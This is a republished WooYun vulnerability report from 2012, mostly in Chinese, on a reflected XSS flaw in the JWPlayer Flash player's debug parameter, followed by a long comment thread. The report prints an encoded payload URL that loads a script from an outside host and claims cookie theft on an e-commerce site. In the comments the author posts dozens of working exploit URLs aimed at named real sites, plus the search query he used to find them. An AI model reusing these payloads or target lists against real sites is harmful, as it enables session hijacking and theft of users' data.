JWPlayer Xss 0day [Flash编程安全问题]

缺陷编号：WooYun-2012-07166

漏洞标题：JWPlayer Xss 0day [Flash编程安全问题]

相关厂商：LongTail Video

漏洞作者：gainover

提交时间：2012-05-15

公开时间：2012-05-15

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：http://www.wooyun.org

Tags标签：第三方不可信程序 XSS 反射型xss flash安全 flash应用安全 flash利用 JWPlayer

披露状态：

2012-05-15：积极联系厂商并且等待厂商认领中，细节不对外公开

2012-05-15：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

国外的一款播放器，使用网站数量超过百万，官方介绍：“LongTail Video is a New York-based startup that has pioneered the web video market. Our flagship product the - JW Player - is active on over one million websites and streams billions of videos each month.”

该FLASH版本视频播放器代码编写上存在一处安全问题，利用之前我所用到的技巧，可以进行跨站攻击。

它自己主站跨站到无所谓啦，但是用到这个播放器的其它网站就难说了。

比如中国的“去哪儿” ，美国的某某某某站。。

详细说明：

A Xss vulnerability in JWPlayer

Test Browser: IE , Firefox.

Test Platform: Win 7.

1. The Bug code in

package com.longtailvideo.jwplayer.utils
class Logger
private static function send(_arg1:String):void

if (ExternalInterface.available){
ExternalInterface.call(_config.debug, text);<---directly use _config.debug
};

2. The _config.debug is directly used as the first parameter of ExternalInterface.call. And the _config is loaded from loaderInfo.parameters. Therefore, when we construct a link such as " jwplayer.swf?debug=(function(){alert('xxx')})() ", the passed-in javascript code will be run.

3. Then we can use the trick location.href='javascript:"<script src={js file url}></script>"' to load and run external javascript file.

Test encoded evil code:

http://player.longtailvideo.com/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D)

4. That's all

漏洞证明：

1. Simple Alert

JWPlayer Xss 0day [Flash编程安全问题]

2. Stolen Cookies in a chinese e-commerce website.

JWPlayer Xss 0day [Flash编程安全问题]

修复方案：

Limit the length of "debug" parameters and check its content.

乌云欢乐吐槽：

2012-05-15 23:40 | imlonghao (核心白帽子 | Rank:600 漏洞数:60 | 喜迎世界末日！)

跨站师，去把各大视频网站扫荡一遍吧！

2012-05-15 23:47 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@去哪儿关于这个播放器的，俺也不单独发了。。

http://tuan.qunar.com/static/img/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D%29

2012-05-16 00:24 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@Intel

http://www.intel.com/about/companyinfo/healthcare/products/reader/swf/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D%29

2012-05-16 00:31 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百度

http://youxi.baidu.com/media/player.swf?debug=function(){alert(/xxx/)} 貌似服务器那边过滤了' 利用代码上需要稍微变通

2012-05-16 00:34 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@AT&T

http://pte.att.com/player.swf?debug=alert

2012-05-16 00:36 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百度

http://www.baidu.com/search/zhidao/badminton/jwplayer/player.swf?debug=alert 主域名的

2012-05-16 00:37 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百度

http://ued.baidu.com/wp-content/plugins/flash-video-player/mediaplayer/player.swf?debug=alert 百度UED，看来很多装了WP的都用了这个插件。

2012-05-16 00:38 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百度

http://sem.baidu.com/jw_player/player.swf?debug=alert

2012-05-16 00:39 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@gainover 你妹。。你怎么搜索的。。我怎么没找到这么多

2012-05-16 00:44 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@蟋蟀哥哥 = = GOOGLE inurl:(player.swf) 其它的你懂的。。

10#

2012-05-16 00:44 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@新浪

http://nokia.sina.com.cn/n8/player/player.swf?debug=alert

11#

2012-05-16 00:48 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@gainover 别爆了，留着刷分。。。

12#

2012-05-16 00:53 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@蟋蟀哥哥 = = 这些都给厂商算了，反正我也没用的到的地方。。这文章已经公开了，被别人拿去做坏事了也不太好，先把大站好找的找了先咯。。

13#

2012-05-16 00:53 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@gainover 哈哈。。

14#

2012-05-16 01:09 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@猫扑

http://yximg.mop.com/minisite/201007/baodaopage/Scripts/player.swf?debug=alert

15#

2012-05-16 01:10 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@猫扑

http://yximg.mop.com/minisite/200911/jilie/Scripts/player.swf?debug=alert

16#

2012-05-16 02:08 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@中国网络电视台

http://t.live.cntv.cn/oceantest/player.swf?debug=alert

17#

2012-05-16 02:12 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@走秀网

http://tuan.xiu.com/static/theme/YellowUMZZ/img/player.swf?debug=alert

18#

2012-05-16 02:13 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百合网

http://images.baihe.com/images/landingpage/images/video/player.swf?debug=alert

= = 感觉每个站都在用这个播放器

19#

2012-05-16 02:17 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百合网

http://act.baihe.com/event/1104lovevideo/player.swf?debug=alert

http://story.baihe.com/player.swf?debug=alert

http://act.baihe.com/event/1009zhidao/player.swf?debug=alert

http://act.baihe.com/event/1026zhidao/player.swf?debug=alert

另外 act.baihe.com 与 story.baihe.com , images.baihe.com 全部都存在apache http-only cookies 泄漏漏洞。

20#

2012-05-16 02:19 | testcvc ( 实习白帽子 | Rank:5 漏洞数:1 | test)

@gainover 大站都快被你爆完了

21#

2012-05-16 02:21 | zeracker ( 普通白帽子 | Rank:891 漏洞数:119 | 哥，怒了！)

我嘞个去。灾难来了。。。。

22#

2012-05-16 02:21 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@诺基亚

http://blog.maps.nokia.com/wp-content/plugins/vipers-video-quicktags/resources/jw-flv-player/player.swf?debug=alert

23#

2012-05-16 02:24 | zeracker ( 普通白帽子 | Rank:891 漏洞数:119 | 哥，怒了！)

@gainover ..................................... 这个cncert应该要预警了吧？ @cncert国家互联网应急中心呼叫，呼叫

24#

2012-05-16 02:28 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@zeracker = = 不晓得，反正国内用这个程序的不在少数。腾讯啥的也有用，不过他们用的是旧版的。。4.1的。感觉其实这个可以交给 cncert 处理的。

25#

2012-05-16 02:40 | 小禾吉( 实习白帽子 | Rank:0 漏洞数:1 | 宇宙的目的很可能和人类没有关系，宇宙很可...)

这个很霸气~

26#

2012-05-16 02:45 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@京东商城

http://market.360buy.com/zhuanmai/ECOVACS/player.swf?debug=alert

27#

2012-05-16 02:47 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@华为

http://ipv6.huawei.com/en/ucmf/groups/public/documents/webasset/player.swf?debug=alert

28#

2012-05-16 02:51 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@华为技术有限公司好像挺多。。

http://ipv6.huawei.com/en/ucmf/groups/public/documents/webasset/player.swf?debug=alert

http://www-hk.huawei.com/cn/ucmf/groups/public/documents/webasset/player.swf

http://ipv6.huawei.com/cn/ucmf/groups/public/documents/webasset/player.swf

http://www.huawei.com/minisite/mwc2012/cn/js/player.swf

http://www.huawei.com/za/ucmf/groups/public/documents/webasset/player.swf

以下省略若干个

29#

2012-05-16 02:52 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@4399小游戏

http://news.4399.com/tnt/images/player.swf?debug=alert

30#

2012-05-16 02:54 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@4399小游戏

http://news.4399.com/dnf/flash/player.swf DNF。。。不会每个游戏目录下都有一个吧！！

31#

2012-05-16 03:00 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@盛大在线

http://qn.sdo.com/web1/swf/player.swf

http://qn.sdo.com/web/swf/player.swf

http://media.static.sdo.com/ac/ac/project/acguide/flash/player.swf?debug=alert

32#

2012-05-16 03:02 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@凤凰网

http://sn.ifeng.com/guowenwangzhan/greensn/video/player.swf?debug=alert

33#

2012-05-16 03:05 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@久游网

http://dl-hb.9you.com/play/Player.swf?debug=alert

34#

2012-05-16 03:13 | 小博( 实习白帽子 | Rank:3 漏洞数:1 | 一个关注与信息安全程序开发的IT程序员)

别爆了

35#

2012-05-16 03:20 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@小博没的爆了，差不多就这么些吧～～肯定还有一些是改过名字，不叫player.swf 的～～得换个方法搜索了

36#

2012-05-16 03:33 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

试了下，果然有不叫player.swf的比如新浪的 @新浪

http://all.vic.sina.com.cn/listerine21days/flash/player/player-viral.swf

37#

2012-05-16 03:35 | 小博( 实习白帽子 | Rank:3 漏洞数:1 | 一个关注与信息安全程序开发的IT程序员)

@gainover 好的还有发现的么我去提交个看能不能换个新浪的礼物

38#

2012-05-16 05:58 | yingzi ( 普通白帽子 | Rank:38 漏洞数:3 )

关注中

39#

2012-05-16 05:58 | imlonghao (核心白帽子 | Rank:600 漏洞数:60 | 喜迎世界末日！)

@cncert国家互联网应急中心有预警这东西么？

40#

2012-05-16 08:05 | Hxai11 ( 普通白帽子 | Rank:245 漏洞数:47 | 让我们面对现实，让我们忠于理想 --切....)

危险系数很高！！

41#

2012-05-16 08:59 | wanglaojiu ( 普通白帽子 | Rank:45 漏洞数:12 | 道生一，一生二，二生三，三生万物，万物负...)

这么危险的东西，看来好多网站限制使用swf还是有先见之明的。

42#

2012-05-16 09:34 | 123 ( 实习白帽子 | Rank:27 漏洞数:3 | 123)

帅气，我先把我的换掉

43#

2012-05-16 09:45 | ufohacker ( 实习白帽子 | Rank:3 漏洞数:1 | 提高的是能力不是技术！)

求一次完整的攻击实例。

44#

2012-05-16 10:12 | wanglaojiu ( 普通白帽子 | Rank:45 漏洞数:12 | 道生一，一生二，二生三，三生万物，万物负...)

我了个去，试了下基本都是国内的弹框，国外的还没找到个能弹的，难道是后门......同志还需努力啊，代码还是自己敲的好，拷贝来拷贝去的终归不是长久之计。

45#

2012-05-16 10:29 | Power ( 实习白帽子 | Rank:16 漏洞数:2 )

太牛逼了.........

46#

2012-05-16 10:40 | hellok (核心白帽子 | Rank:123 漏洞数:10 | 酱油党路过)

cool~

47#

2012-05-16 10:51 | horseluke ( 普通白帽子 | Rank:84 漏洞数:14 | Realize the dream in earnest.)

JWPlayer的使用量已经达到类似于框架使用的范围，所以出问题这么多也不奇怪。

48#

2012-05-16 11:10 | Lee ( 普通白帽子 | Rank:113 漏洞数:24 | wataru@eviloctal.com)

good！

49#

2012-05-16 11:41 | p.z (核心白帽子 | Rank:300 漏洞数:20 | 我在沉默中被放屁惊醒)

威武！求共享命令行下反编译工具！！！

50#

2012-05-16 12:13 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@p.z = = 哭一个，我没找到。。 swftools里没有把swf转as的。。就只看到一个在线转换的 swf2as （真想搞到源码）。不过ASV有批量的功能。

51#

2012-05-16 16:34 | Valo洛洛( 普通白帽子 | Rank:385 漏洞数:43 | Gone with the sin.)

牛逼了我去

52#

2012-05-17 16:30 | 小龙女( 实习白帽子 | Rank:3 漏洞数:1 | venus)

super ,ps,为啥我是见习白帽子

53#

2012-05-17 22:51 | 肥田鸡( 实习白帽子 | Rank:13 漏洞数:2 | 今天的最好表现是明天的最低要求)

nice!

54#

2012-05-18 07:48 | Hxai11 ( 普通白帽子 | Rank:245 漏洞数:47 | 让我们面对现实，让我们忠于理想 --切....)

@小龙女哈哈，现在wooyun等级制度了

55#

2012-09-25 12:05 | 神刀( 实习白帽子 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛，虾米没妹子？)

好HI

56#

转自：http://www.wooyun.org/bugs/wooyun-2010-07166

文章目录